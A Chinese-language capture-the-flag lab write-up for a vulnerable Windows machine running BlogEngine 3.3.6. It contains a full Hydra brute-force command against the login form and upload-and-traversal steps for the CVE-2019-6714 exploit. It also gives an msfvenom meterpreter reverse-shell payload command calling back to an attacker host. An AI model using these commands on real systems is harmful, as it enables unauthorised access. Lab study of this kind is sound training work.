Hydra 暴力破解
使用 Hydra 暴力登录网站,识别并使用公共漏洞,然后升级在此 Windows 计算机上的权限!
使用 Hydra、RCE 和 WinPEAS 入侵 Windows
用rustscan快速扫描
rustscan -a IP --range 0-65535 -- -sV -sV -oN hackpark.nmap
rustscan怎么用的之前的文章已经介绍过了
https://mp.weixin.qq.com/s/l4ko6-75deWINIq4VoDglg
如果用nmap
nmap -Pn -sC -sV -sS -p IP
访问80端口,看到小丑的图片,保存下载放到google识图中,发现是pennywise(小丑回魂)
使用 Hydra 暴力破解登录,先寻找登录口,目录扫描
他们都返回了 403,但/archive给了这个页面,但里面没有任何有趣的内容
我们之前访问的主页中的选项选项卡有一个登录选项,右键单击登录表单,检查元素,然后读取方法字段中的值来检查表单发出的请求。如果您通过 BurpSuite 拦截流量,也可以识别这一点(其他 HTTP 方法可以在此处找到)。https://www.w3schools.com/tags/ref_httpmethods.asp
先用burp抓包查看post参数
hydra -s 80 -l admin -P /usr/share/wordlists/rockyou.txt {IP} http-post-form "/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=tH3nyjHWshy31CD1HUL212Q2sUlmbJdmA3PH9QrQ49rHSGqip79fK8fK5w4R7A%2BFv2G31xXxSwbuy6esy7JCppaHYfeaUtqtFg4aegSGfDLkkKfhuVa81dv5v2mFDlGJ1If8gDK4WByANbsudxOHKaJxujKDU8OBewkI6AFhnRNcbUma&__EVENTVALIDATION=oztmFtnEAgIEFOmV8sjMAU%2BW5%2BIFfkBcHNipRMg%2FufY3Fjp8pw8gZaDh4fKcBwNZYLmHVX0EIOBoThym43y1HuSP9JPodblTBkUym%2F4InzzxcNfFcy00UcAjFbfzsef8VMHNHfXOxlLnJqSLDO34qyWBaSkrdN5QnpX%2BzDvzCkb0Q3ek&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
hydra怎么用我之前的文章也介绍过
https://www.freebuf.com/articles/web/427704.html
反弹shell
登录之后找到about发现是BlogEngine Version: 3.3.6.0
在 searchsploit 中查找此特定版本的漏洞,结果显示
有 3 个 RCE 漏洞searchsploit -m aspx/webapps/46353.cs ,看到CVE-2019-6714
该漏洞告诉我们需要采取哪些步骤才能获得返回我们机器的反向 shell。
将漏洞利用代码重命名为“PostView.ascx”
更改漏洞利用代码中的 IP 和端口
以管理员身份登录应用程序,点击“内容”->“帖子”->“欢迎来到 Hackpark”->“文件管理器”,点击“上传”,上传 PostView.ascx 并保存,设置 nc 监听器并 访问 exploitdb 上列出的以下 URL http://<ip>/?theme=../../App_Data/files
网页持续加载,这意味着已成功获取 reverse-shell
从 CONTENT 中选择一篇文章。 打开菜单栏最右侧的文件管理器并选择上传。 选择您创建的PostView.ascx,它将被上传。
http://<ip>/?theme=../../App_Data/files
Windows 权限提升
建立稳定的反向shell
我们目前设置的反向shell(Netcat 会话)是不稳定的,因此我们将创建一个稳定的连接。
作为一种流动
- 使用 msfvenom 创建有效载荷。
- 一旦建立,反向 shell 就会用于将有效载荷传送到目标。
- 使用msfconsole建立稳定的连接环境。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=1234 -e x64/shikata_ga_nai -f exe -overse.exe
不运行了,上一个房间用的有效负载直接拿来用
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)